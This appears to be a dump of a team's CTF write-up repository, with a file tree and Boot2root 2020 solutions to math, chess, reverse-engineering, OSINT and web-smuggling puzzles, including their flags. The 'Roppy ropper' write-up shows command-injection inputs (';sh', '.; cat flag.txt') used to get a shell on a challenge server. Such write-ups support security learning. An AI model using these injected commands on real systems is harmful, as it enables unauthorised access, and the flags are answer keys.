├── 2020
    ├── Boot2root_ctf
    │   ├── Active directory
    │   │   ├── README.md
    │   │   └── gpp.zip
    │   ├── Buggy PHP
    │   │   └── README.md
    │   ├── Count the door
    │   │   └── README.md
    │   ├── Immortal
    │   │   ├── README.md
    │   │   ├── chess.png
    │   │   ├── moves
    │   │   └── wiki.png
    │   ├── Open gl
    │   │   ├── README.md
    │   │   ├── base64.png
    │   │   ├── cyberchef.png
    │   │   └── sample
    │   ├── README.md
    │   ├── Roppy ropper
    │   │   └── README.md
    │   ├── Smuggle
    │   │   └── README.md
    │   ├── Staple
    │   │   ├── README.md
    │   │   ├── crackme
    │   │   └── strings.png
    │   ├── Target 1
    │   │   ├── README.md
    │   │   ├── bot.png
    │   │   ├── comment.png
    │   │   ├── decode.png
    │   │   ├── flag.png
    │   │   └── morse.wav
    │   ├── Target 3
    │   │   └── README.md
    │   ├── Try try but don't cry
    │   │   ├── README.md
    │   │   ├── chall.py
    │   │   ├── chall.txt
    │   │   └── cyberchef.png
    │   ├── Upload
    │   │   ├── README.md
    │   │   ├── Ryn0.png
    │   │   ├── flag.txt
    │   │   └── htaccess
    │   ├── Welcome To Pwn
    │   │   └── README.md
    │   ├── boot2root.png
    │   └── rasput1n's string
    │   │   ├── README.md
    │   │   ├── file
    │   │   └── getflag.py
    ├── InterIUT_ctf
    │   ├── La voie du SAGE
    │   │   ├── README.md
    │   │   ├── Sage_Part_1_1.png
    │   │   └── Sage_Part_1_2.png
    │   ├── Le SAGE doré
    │   │   ├── README.md
    │   │   ├── Sage_Part_0_1.png
    │   │   └── Sage_Part_0_2.png
    │   ├── README.md
    │   ├── cature_the_flag
    │   │   ├── README.md
    │   │   ├── chall.png
    │   │   ├── cyberchef.png
    │   │   └── website.png
    │   ├── data_recovery_1
    │   │   ├── README.md
    │   │   ├── linkedin.png
    │   │   └── skrapp.png
    │   ├── graph.png
    │   ├── ping_pong
    │   │   ├── README.md
    │   │   └── ping_pong.pcapng
    │   ├── rank.png
    │   ├── we_will_rock_you
    │   │   ├── README.md
    │   │   ├── hash
    │   │   └── hash-types.png
    │   └── we_will_rock_you_again
    │   │   ├── README.md
    │   │   ├── hash-identifier.png
    │   │   ├── hashcatss.png
    │   │   ├── help.png
    │   │   └── show.png
    ├── affinity_ctf_lite
    │   ├── Aether plane take off
    │   │   ├── README.md
    │   │   ├── aether_plane_take_off.wav
    │   │   └── figidi-result.png
    │   ├── Astatine
    │   │   ├── Base85CyberChef.png
    │   │   └── README.md
    │   ├── Black Dots
    │   │   ├── README.md
    │   │   ├── Script2.png
    │   │   └── mg.png
    │   ├── BreakMe
    │   │   ├── README.md
    │   │   ├── encrypted.txt
    │   │   └── public.pem
    │   ├── Catch_me_if_you_can
    │   │   ├── README.md
    │   │   └── images
    │   │   │   ├── img.png
    │   │   │   ├── long-polls.png
    │   │   │   └── pwn.gif
    │   ├── Char_Wrap
    │   │   ├── README.md
    │   │   ├── charwrap
    │   │   ├── charwrap.png
    │   │   ├── file.png
    │   │   └── stringsuse.png
    │   ├── Classic_Forensics
    │   │   ├── README.md
    │   │   ├── description.png
    │   │   ├── fileinfo.png
    │   │   └── volatility.png
    │   ├── Fibonacci
    │   │   ├── Fibonacci
    │   │   ├── Fibonacci.7z
    │   │   ├── README.md
    │   │   ├── main.py
    │   │   └── out.7z
    │   ├── Hongqiao
    │   │   ├── README.md
    │   │   └── crackstation.png
    │   ├── I need bass
    │   │   ├── README.md
    │   │   ├── b58CyberChef.png
    │   │   └── site.png
    │   ├── Lost_Head
    │   │   ├── README.md
    │   │   ├── description.png
    │   │   ├── lostHead.pcapng
    │   │   └── wiresharkscreenshot.png
    │   ├── Magic Word
    │   │   ├── README.md
    │   │   ├── flag_printed.png
    │   │   ├── jmp.png
    │   │   ├── magicword
    │   │   ├── magicword.png
    │   │   └── nops.png
    │   ├── Malicious File
    │   │   ├── README.md
    │   │   ├── base64.png
    │   │   ├── community.png
    │   │   ├── malware
    │   │   └── virustotal.png
    │   ├── NotRandomCMS
    │   │   ├── CMS.7z
    │   │   └── README.md
    │   ├── One is missing
    │   │   ├── README.md
    │   │   ├── full_of__cuteness.jpg
    │   │   └── strings.png
    │   ├── Path of Double-Dipping
    │   │   ├── README.md
    │   │   ├── flag.png
    │   │   ├── ndc.png
    │   │   └── urltwice.png
    │   ├── Path_of_the_suspect
    │   │   ├── Figure_1.png
    │   │   ├── README.md
    │   │   ├── archive
    │   │   │   ├── Figure_1.png
    │   │   │   ├── gpsvis
    │   │   │   ├── locs.json
    │   │   │   ├── locs1.json
    │   │   │   ├── locs_b.json
    │   │   │   ├── main.py
    │   │   │   ├── main1.py
    │   │   │   ├── manual_locs.txt
    │   │   │   ├── mapcust.txt
    │   │   │   ├── notes.md
    │   │   │   ├── notes.txt
    │   │   │   ├── parse.py
    │   │   │   ├── proc.py
    │   │   │   ├── proc1.py
    │   │   │   ├── proc2.py
    │   │   │   ├── proc3.py
    │   │   │   ├── src.json
    │   │   │   └── src.txt
    │   │   ├── locs.json
    │   │   ├── main.py
    │   │   ├── map.png
    │   │   ├── mapconv
    │   │   ├── parse.py
    │   │   ├── proc.py
    │   │   ├── src.json
    │   │   ├── src.txt
    │   │   └── suspect_BTS_registration_log.pdf
    │   ├── README.md
    │   ├── Shark has a long tail
    │   │   ├── CyberChef.png
    │   │   ├── README.md
    │   │   ├── SharkHasALongTail.pcap
    │   │   ├── tcp_lengths.txt
    │   │   └── wire_shark.png
    │   ├── Wholeisbetter
    │   │   ├── README.md
    │   │   └── There_is_a_flag_somewhere.pdf
    │   ├── collision_course
    │   │   ├── README.md
    │   │   ├── collision1.zip
    │   │   └── collision2.zip
    │   ├── dias skeerG tneicna
    │   │   ├── README.md
    │   │   └── decode.me
    │   ├── operationsluggishhamster
    │   │   ├── README.md
    │   │   ├── flag.png
    │   │   ├── ostrichflag.png
    │   │   ├── pubkey.png
    │   │   ├── sherlock.png
    │   │   ├── wayback.png
    │   │   └── wp1.png
    │   ├── pseudo-pseudo-random
    │   │   └── README.md
    │   ├── rank.png
    │   ├── sooodefault
    │   │   ├── README.md
    │   │   └── script.png
    │   └── true-content
    │   │   ├── README.md
    │   │   └── images
    │   │       ├── before-redirect.png
    │   │       ├── construction.png
    │   │       └── solve.png
    ├── asis_ctf
    │   ├── Dream
    │   │   └── README.md
    │   ├── Izzy
    │   │   └── README.md
    │   ├── Less secure secrets
    │   │   └── README.md
    │   ├── README.md
    │   └── asis.png
    ├── dragon_ctf
    │   └── README.md
    ├── sunshine_ctf
    │   ├── README.md
    │   ├── hotel
    │   │   ├── .gdb_history
    │   │   ├── README.md
    │   │   ├── a.out
    │   │   ├── decomp.c
    │   │   ├── decomp1.c
    │   │   ├── hotel_key_puzzle
    │   │   ├── key.txt
    │   │   ├── main.py
    │   │   ├── notes.md
    │   │   ├── scrap.py
    │   │   └── test.c
    │   ├── pegasus
    │   │   ├── EAR_EAR.md
    │   │   ├── LicenseChecker.peg
    │   │   ├── PEGASUS.md
    │   │   ├── PEGASUS_User_Guide.peg
    │   │   ├── bof.peg
    │   │   ├── core.sh.25065
    │   │   ├── dump
    │   │   ├── dump1
    │   │   ├── flag.txt
    │   │   ├── libpegasus_ear.so
    │   │   ├── license_check
    │   │   │   └── README.md
    │   │   ├── main.py
    │   │   ├── main1.py
    │   │   ├── notes.md
    │   │   ├── payload
    │   │   ├── peg_brute_checker.so
    │   │   ├── peg_dev_checker.so
    │   │   ├── peg_pwn_checker.so
    │   │   ├── peg_rev_checker.so
    │   │   ├── runpeg
    │   │   ├── scramble.py
    │   │   ├── scramble1.py
    │   │   ├── scratch.md
    │   │   ├── shit
    │   │   └── submitpeg
    │   ├── rank.png
    │   └── speedrun
    │   │   ├── 0
    │   │       ├── .gdb_history
    │   │       ├── chall_00
    │   │       ├── main.py
    │   │       └── payload
    │   │   ├── 1
    │   │       ├── .gdb_history
    │   │       ├── chall_01
    │   │       ├── main.py
    │   │       └── payload
    │   │   ├── 2
    │   │       ├── .gdb_history
    │   │       ├── a.out
    │   │       ├── chall_02
    │   │       ├── core
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       ├── payload
    │   │       └── test.c
    │   │   ├── 3
    │   │       ├── .gdb_history
    │   │       ├── chall_03
    │   │       ├── core
    │   │       ├── main.py
    │   │       └── payload
    │   │   ├── 4
    │   │       ├── .gdb_history
    │   │       ├── chall_04
    │   │       ├── core
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 5
    │   │       ├── .gdb_history
    │   │       ├── chall_05
    │   │       ├── core
    │   │       └── main.py
    │   │   ├── 6
    │   │       ├── .gdb_history
    │   │       ├── chall_06
    │   │       ├── core
    │   │       ├── main.py
    │   │       └── notes.md
    │   │   ├── 7
    │   │       ├── .gdb_history
    │   │       ├── chall_07
    │   │       ├── core
    │   │       ├── main.py
    │   │       └── notes.md
    │   │   ├── 8
    │   │       ├── .gdb_history
    │   │       ├── chall_08
    │   │       ├── main.py
    │   │       └── notes.md
    │   │   ├── 9
    │   │       ├── .gdb_history
    │   │       ├── chall_09
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 10
    │   │       ├── .gdb_history
    │   │       ├── chall_10
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 11
    │   │       ├── .gdb_history
    │   │       ├── chall_11
    │   │       ├── core
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 12
    │   │       ├── .gdb_history
    │   │       ├── chall_12
    │   │       ├── main.py
    │   │       └── payload
    │   │   ├── 13
    │   │       ├── .gdb_history
    │   │       ├── chall_13
    │   │       ├── core
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 14
    │   │       ├── .gdb_history
    │   │       ├── README.md
    │   │       ├── chall_14
    │   │       ├── core
    │   │       ├── main.py
    │   │       ├── main_srop.py
    │   │       ├── notes.md
    │   │       ├── payload
    │   │       ├── rop.txt
    │   │       └── scrap.py
    │   │   ├── 15
    │   │       ├── .gdb_history
    │   │       ├── chall_15
    │   │       ├── core
    │   │       ├── flag.txt
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 16
    │   │       ├── .gdb_history
    │   │       ├── chall_16
    │   │       ├── main.py
    │   │       ├── notes.md
    │   │       └── payload
    │   │   ├── 17
    │   │       ├── .gdb_history
    │   │       ├── a.out
    │   │       ├── chall_17
    │   │       ├── main.py
    │   │       └── test.c
    │   │   └── README.md
    └── vulnfreak_ctf
    │   ├── 4li3n W4nt H3lp
    │       ├── README.md
    │       └── chall.PNG
    │   ├── Anonymous
    │       ├── README.md
    │       ├── spectogram.png
    │       └── video.mp4
    │   ├── Base Fun
    │       ├── README.md
    │       ├── chall.txt
    │       └── screenshot.png
    │   ├── Binary or Not
    │       └── README.md
    │   ├── Class Bunk Case
    │       ├── FLAG.png
    │       └── README.md
    │   ├── Do It Man
    │       ├── 1.jpg
    │       ├── 2.jpg
    │       ├── 3.jpg
    │       ├── 4.jpg
    │       ├── README.md
    │       └── chall.apk
    │   ├── Fort Mystery
    │       ├── README.md
    │       └── decodefr.png
    │   ├── Mega Sale
    │       ├── README.md
    │       ├── flag.jpg
    │       ├── life_efil.txt
    │       └── screenshot.png
    │   ├── Mr Robot
    │       ├── README.md
    │       ├── foremost.png
    │       ├── mrrobot.jpg
    │       └── robot1.jpg
    │   ├── New Encryption
    │       ├── README.md
    │       └── Script.py
    │   ├── Next Target
    │       ├── README.md
    │       └── assets
    │       │   ├── chall.png
    │       │   └── next-target.PNG
    │   ├── Note on desk
    │       ├── README.md
    │       ├── notes.zip
    │       └── out.jpg
    │   ├── Programming Fight
    │       └── README.md
    │   ├── README.md
    │   ├── logo.png
    │   └── rank.png
├── 2021
    ├── README.md
    └── cybergrab_ctf
    │   ├── Easy!!!
    │       ├── README.md
    │       ├── cyberchef.png
    │       ├── file.txt
    │       ├── flag.txt
    │       ├── index.jpeg
    │       ├── rot13.png
    │       └── steghide.png
    │   ├── Jasper
    │       ├── Jasper.jpg
    │       └── readme.md
    │   ├── README.md
    │   ├── Wonderful Colours
    │       ├── README.md
    │       ├── colorcode.png
    │       └── colourful.png
    │   ├── everyone intrested in my secret life ( ᴗ )
    │       ├── README.md
    │       ├── base64.png
    │       └── jwt_tool.png
    │   ├── follow
    │       └── readme.md
    │   └── scoreboard.png
├── 2022
    ├── CybergrabsCTF
    │   ├── README.md
    │   └── screenshot.png
    ├── DefCampCTF
    │   ├── README.md
    │   └── scoreboard.png
    ├── HayyimCTF
    │   ├── README.md
    │   └── scoreboard.png
    ├── KnightCTF
    │   ├── Digital Forensics
    │   │   ├── Digital Forensics.png
    │   │   ├── README.md
    │   │   ├── The Lost Flag
    │   │   │   ├── Lost Flag .png
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   ├── que.png
    │   │   │   ├── sol.png
    │   │   │   └── sol.txt
    │   │   └── Unknown File
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   ├── que.png
    │   │   │   ├── unknown file
    │   │   │   └── unknown file.zip
    │   ├── Misc
    │   │   ├── Look Closely
    │   │   │   ├── 1.png
    │   │   │   ├── 2.png
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   ├── look closely.wav
    │   │   │   ├── que.png
    │   │   │   └── settings.png
    │   │   ├── Misc.png
    │   │   ├── README.md
    │   │   └── The Hungry Dragon
    │   │   │   ├── README.md
    │   │   │   ├── The Hungry Dragon.3mf
    │   │   │   ├── dragon.png
    │   │   │   ├── hideDragon.png
    │   │   │   ├── insideDragon.png
    │   │   │   └── que.png
    │   ├── OSINT
    │   │   ├── Canada
    │   │   │   ├── 1.png
    │   │   │   ├── 1que.png
    │   │   │   ├── 2.png
    │   │   │   ├── README.md
    │   │   │   └── flag.txt
    │   │   ├── Explosion In Front Of Bank Of Spain
    │   │   │   ├── 1.png
    │   │   │   ├── Explosion_In_Front_Of_Bank_Of_Spain.png
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   └── que.png
    │   │   ├── Find The Camera
    │   │   │   ├── 1.png
    │   │   │   ├── Bus.png
    │   │   │   ├── README.md
    │   │   │   └── que.png
    │   │   ├── OSINT.png
    │   │   └── README.md
    │   ├── Programming
    │   │   ├── Find The Number
    │   │   │   ├── flag.txt
    │   │   │   └── sol.py
    │   │   ├── Keep Calculating
    │   │   │   ├── flag.txt
    │   │   │   └── sol.py
    │   │   ├── Programming.png
    │   │   ├── README.md
    │   │   ├── Reverse The Answer
    │   │   │   ├── flag.txt
    │   │   │   └── sol.py
    │   │   ├── Something In Common
    │   │   │   ├── flag.txt
    │   │   │   └── sol.py
    │   │   └── Squre Sum
    │   │   │   ├── sol.py
    │   │   │   └── sol.txt
    │   ├── README.md
    │   ├── Steganography
    │   │   ├── FileD
    │   │   │   ├── 1.png
    │   │   │   ├── 2.png
    │   │   │   ├── README.md
    │   │   │   ├── filed.kra
    │   │   │   ├── flag.txt
    │   │   │   └── que.png
    │   │   ├── Follow The White Rabbit
    │   │   │   ├── 1.png
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   ├── que.png
    │   │   │   └── whiterabbit.jpg
    │   │   ├── Follow
    │   │   │   ├── 1.png
    │   │   │   ├── Follow.pdf
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   └── que.png
    │   │   ├── QR Code From The Future
    │   │   │   ├── QR_Code_From_The_Future.gif
    │   │   │   ├── README.md
    │   │   │   ├── flag.txt
    │   │   │   ├── img
    │   │   │   │   ├──   0.png
    │   │   │   │   ├──   1.png
    │   │   │   │   ├──   2.png
    │   │   │   │   ├──   3.png
    │   │   │   │   ├──   4.png
    │   │   │   │   ├──   5.png
    │   │   │   │   ├──   6.png
    │   │   │   │   ├──   7.png
    │   │   │   │   ├──   8.png
    │   │   │   │   ├──   9.png
    │   │   │   │   ├──  10.png
    │   │   │   │   ├──  11.png
    │   │   │   │   ├──  12.png
    │   │   │   │   ├──  13.png
    │   │   │   │   ├──  14.png
    │   │   │   │   ├──  15.png
    │   │   │   │   ├──  16.png
    │   │   │   │   ├──  17.png
    │   │   │   │   ├──  18.png
    │   │   │   │   ├──  19.png
    │   │   │   │   ├──  20.png
    │   │   │   │   ├──  21.png
    │   │   │   │   ├──  22.png
    │   │   │   │   ├──  23.png
    │   │   │   │   ├──  24.png
    │   │   │   │   ├──  25.png
    │   │   │   │   ├──  26.png
    │   │   │   │   ├──  27.png
    │   │   │   │   ├──  28.png
    │   │   │   │   ├──  29.png
    │   │   │   │   ├──  30.png
    │   │   │   │   ├──  31.png
    │   │   │   │   ├──  32.png
    │   │   │   │   ├──  33.png
    │   │   │   │   ├──  34.png
    │   │   │   │   ├──  35.png
    │   │   │   │   ├──  36.png
    │   │   │   │   ├──  37.png
    │   │   │   │   ├──  38.png
    │   │   │   │   ├──  39.png
    │   │   │   │   ├──  40.png
    │   │   │   │   ├──  41.png
    │   │   │   │   ├──  42.png
    │   │   │   │   ├──  43.png
    │   │   │   │   ├──  44.png
    │   │   │   │   ├──  45.png
    │   │   │   │   ├──  46.png
    │   │   │   │   └──  47.png
    │   │   │   └── que.png
    │   │   ├── README.md
    │   │   └── Steganography.png
    │   └── scoreboard2.png
    └── SquidCTF
    │   ├── Forensics
    │       ├── Forensics.png
    │       ├── Is it or it isn’t [134]
    │       │   ├── README.md
    │       │   ├── flag.txt
    │       │   ├── que.png
    │       │   ├── sol.sh
    │       │   └── status.txt
    │       ├── It will take too long [104]
    │       │   ├── README.md
    │       │   ├── Zipped99.zip
    │       │   ├── flag.txt
    │       │   ├── que.png
    │       │   └── sol.sh
    │       ├── Player 001 [30]
    │       │   ├── README.md
    │       │   ├── confidential.mp3
    │       │   ├── confidential_(rev).mp3
    │       │   ├── flag.txt
    │       │   └── que.png
    │       └── README.md
    │   ├── OSINT
    │       ├── Anonymous Call [140]
    │       │   ├── README.md
    │       │   ├── dec-to-ascii.png
    │       │   ├── flag.txt
    │       │   ├── hello.wav
    │       │   └── que.png
    │       ├── Belarus [20]
    │       │   ├── README.md
    │       │   ├── flag.txt
    │       │   ├── image.png
    │       │   ├── image_good_quality.png
    │       │   ├── image_map.png
    │       │   ├── image_station.png
    │       │   ├── image_zoom.png
    │       │   └── que.png
    │       ├── OSINT.png
    │       └── README.md
    │   ├── README.md
    │   └── scoreboard.png
├── .gitignore
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | **/.DS_Store
2 | .DS_Store


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Active directory/gpp.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Active directory/gpp.zip


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Count the door/README.md:
--------------------------------------------------------------------------------
 1 | # Count the doors
 2 | **category: programming**  
 3 | **points: 440**
 4 | 
 5 | ## Description
 6 | N = 898399329838283293892392328398239832
 7 | 
 8 | There are N doors, all closed. In a nearby cage are N apes.
 9 | 
10 | The first ape is let out, and runs along the doors opening every one. The second ape is then let out, and runs along the doors closing the 2nd, 4th, 6th,… - all the even-numbered doors. The third ape is let out. He attends only to the 3rd, 6th, 9th,… doors (every third door, in other words), closing any that is open and opening any that is closed, and so on. After all N apes have done their work in this way, how many doors are still open.
11 | 
12 | Enclose the number in b00t2root{}
13 | 
14 | ## Solution
15 | This problem is like the [100 doors challenge](https://rosettacode.org/wiki/100_doors) but with a really large integer. The solution is to count the number of perfect squares up to N as noted [here](https://rosettacode.org/wiki/Talk:100_doors). To get the number of perfect squares, we just have to get the square root of N. We can use this [website](https://www.calculator.net/big-number-calculator.html) to do calculations on big numbers.
16 | 
17 | **FLAG:** `b00t2root{947839295365139044}`
18 | 
19 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/README.md:
--------------------------------------------------------------------------------
 1 | # Immortal
 2 | 
 3 | **Category**: Programming \
 4 | **Points**: 479
 5 | 
 6 | ## Discription
 7 | 
 8 | > How many pawns are left on the board after the game is completed?
 9 | a = number of black pawns left
10 | b = number of white pawns left
11 | Submit the answer as: b00t2root{a,b}
12 | 
13 | ## Solution
14 | 
15 | We were given [moves](moves) file. Looking into the file, i don't understand what type of data is it. Searching on google gave us this page [Pirc_Defence](https://en.wikipedia.org/wiki/Pirc_Defence). So these are `chess` moves
16 | 
17 | Scrolling the page gave us `Example Games`. One game moves are same as given in the [moves](moves) file.
18 | 
19 | ![](wiki.png)
20 | 
21 | So i searched for that particular game on google and got a great [website](https://www.chess.com/blog/SamCopeland/the-greatest-chess-game-of-all-time-explained-kasparov-vs-topalov-1999) that show the whole game in Graphical Format
22 | 
23 | we need to know the number of white and black pawns left in last
24 | 
25 | ![](chess.png)
26 | 
27 | FLAG : b00t2root{4,3}
28 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/chess.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Immortal/chess.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/moves:
--------------------------------------------------------------------------------
 1 | 1.e4 d6
 2 | 2.d4 Nf6
 3 | 3.Nc3 g6
 4 | 4.Be3 Bg7
 5 | 5.Qd2 c6
 6 | 6.f3 b5
 7 | 7.Nge2 Nbd7
 8 | 8.Bh6 Bxh6
 9 | 9.Qxh6 Bb7
10 | 10.a3 e5
11 | 11.O-O-O Qe7
12 | 12.Kb1 a6
13 | 13.Nc1 O-O-O
14 | 14.Nb3 exd4
15 | 15.Rxd4 c5
16 | 16.Rd1 Nb6
17 | 17.g3 Kb8
18 | 18.Na5 Ba8
19 | 19.Bh3 d5
20 | 20.Qf4+ Ka7
21 | 21.Rhe1 d4
22 | 22.Nd5 Nbxd5
23 | 23.exd5 Qd6
24 | 24.Rxd4 cxd4
25 | 25.Re7+ Kb6
26 | 26.Qxd4+ Kxa5
27 | 27.b4+ Ka4
28 | 28.Qc3 Qxd5
29 | 29.Ra7 Bb7
30 | 30.Rxb7 Qc4
31 | 31.Qxf6 Kxa3
32 | 32.Qxa6+ Kxb4
33 | 33.c3+ Kxc3
34 | 34.Qa1+ Kd2
35 | 35.Qb2+ Kd1
36 | 36.Bf1 Rd2
37 | 37.Rd7 Rxd7
38 | 38.Bxc4 bxc4
39 | 39.Qxh8 Rd3
40 | 40.Qa8 c3
41 | 41.Qa4+ Ke1
42 | 42.f4 f5
43 | 43.Kc1 Rd2
44 | 44.Qa7


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Immortal/wiki.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Immortal/wiki.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/README.md:
--------------------------------------------------------------------------------
 1 | # Open gl
 2 | 
 3 | **Category**: Reverse Enginnering \
 4 | **Points**: 490
 5 | 
 6 | ## Solution
 7 | 
 8 | We are given a [binary](sample). As always, i ran strings on it. Looking to the output we have some strings
 9 | 
10 | ![](base64.png)
11 | 
12 | decoding them from `cyberchef` leaks most of the flag
13 | 
14 | ![](cyberchef.png)
15 | 
16 | looking at the flag it was obvious the last word is `great`
17 | 
18 | Flag : `b00t2root{opengl_programs_are_great}`
19 | 
20 | (This was not the intended solution of this challenge but authors forgot about strings)
21 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/base64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/base64.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/cyberchef.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Open gl/sample:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Open gl/sample


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/README.md:
--------------------------------------------------------------------------------
 1 | # Boot2Root CTF 2020
 2 | 
 3 | **Site** : https://boot2root.team
 4 | 
 5 | **Rank** : 9/124
 6 | 
 7 | ![](boot2root.png)
 8 | 
 9 | 
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Roppy ropper/README.md:
--------------------------------------------------------------------------------
 1 | # Roppy ropper
 2 | **category: pwn**  
 3 | **points: 467**
 4 | 
 5 | ## Description
 6 | I love ropes do you?  
 7 | nc 35.238.225.156 1004
 8 | 
 9 | ## Solution
10 | After running netcat, this prompt showed up.
11 | ```
12 | $ nc 35.238.225.156 1004
13 | (list_me_like_crazy)
14 | Is this lsass I dont understand :)
15 | Give me your arguments:
16 | ```
17 | I tried several inputs and got this:
18 | ```
19 | (list_me_like_crazy)
20 | Is this lsass I dont understand :)
21 | Give me your arguments:
22 | .
23 | Result: ls .:
24 | flag.txt
25 | lsass
26 | ```
27 | It looks like this program runs `ls` with input from us. Then I tried using a new bash statement to cat the flag.txt file.
28 | ```
29 | Is this lsass I dont understand :)
30 | Give me your arguments:
31 | .; cat flag.txt
32 | Result: ls .; :
33 | flag.txt
34 | lsass
35 | ```
36 | It didn't work. Looks like only 3 characters is acceptable as input. Then I tried getting a reverse shell with `sh`.
37 | ```
38 | (list_me_like_crazy)
39 | Is this lsass I dont understand :)
40 | Give me your arguments:
41 | ;sh
42 | Result: ls ;sh:
43 | flag.txt
44 | lsass
45 | cat flag.txt
46 | b00t2root{R0p_cHa1nS_ar3_tH3_b3st}
47 | ```
48 | It worked!
49 | 
50 | **FLAG:** `b00t2root{R0p_cHa1nS_ar3_tH3_b3st}`
51 | 
52 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Smuggle/README.md:
--------------------------------------------------------------------------------
 1 | # **Smuggle**(web)
 2 | 
 3 | [challenge url](https://192.34.57.73:8001/)
 4 | ![](https://i.imgur.com/SBTlVUU.png)
 5 | 
 6 | when i go to https://192.34.57.73:8001/flag i got **400 status code**
 7 | than i concluded that it needs to use as this as tunnel to make request to backend server.
 8 | 
 9 | by using this script : https://github.com/BishopFox/h2csmuggler (thanks to author)
10 | ![](https://i.imgur.com/YM6a0F3.png)
11 | 
12 | # flag : b00t2root{so_you_know_how_to_smuggle}
13 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/README.md:
--------------------------------------------------------------------------------
 1 | # Staple 
 2 | 
 3 | **Category**: Reverse Enginnering \
 4 | **Points**: 481
 5 | 
 6 | ## Discription
 7 | 
 8 | > Whats the secret code Note:-Enclose secret code in b00t2root{}
 9 | 
10 | ## Solution
11 | 
12 | So we are given [crackme](crackme) to reverse and get the secret code. First thing i do is, check out the strings
13 | 
14 | ![](strings.png)
15 | 
16 | FLAG : `b002root{62f6sHpFshNh844rTh}`
17 | 
18 | (This was not the intended solution of this challenge but authors forgot about strings)
19 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Staple/crackme


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Staple/strings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Staple/strings.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/README.md:
--------------------------------------------------------------------------------
 1 | # Target 1
 2 | 
 3 | **Category**: OSINT \
 4 | **Points**: 100
 5 | 
 6 | ## Discription
 7 | 
 8 | > There is a secret agent deep in enemy territory relaying critical information through clues spread all over the web. Your job, as a hacker at the NSA, is to find the clues about his targets and get the final information which is in the form of flags.
 9 | To aid you on this journey, we have found a discord bot (check the main server) which gives you the appropriate flag on sending the name of the next target (All caps with no spaces). If you are stuck, don't hesitate to contact the mastermind of this operation, @rasput1n#8331 on the main server.
10 | The next challenges are continuation of this challenge.
11 | For the first clue, send a message "^info" (without quotes) to the discord bot.
12 | Note: To send messages to the bot, you need to use ^ before every command.
13 | 
14 | ## Solution
15 | 
16 | As said in discription i messaged the bot `^info`
17 | 
18 | ![](bot.png)
19 | 
20 | So we got a instagram username `redjohn190989`. Looking into that account, in 2nd post one comment catch my eyes 
21 | 
22 | ![](comment.png)
23 | 
24 | Going to the url we have a [wav file](morse.wav). It was `Morse Code` 
25 | 
26 | ![](decode.png)
27 | 
28 | Decoding it online give us a string. Passing it to bot give us the flag
29 | 
30 | ![](flag.png)
31 | 
32 | FLAG : `b00t2root{m0rs3_d3cod3r_i5_fun}`
33 | 


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/bot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Target 1/bot.png


--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Target 1/comment.png:
--------------------------------------------------------------------------------
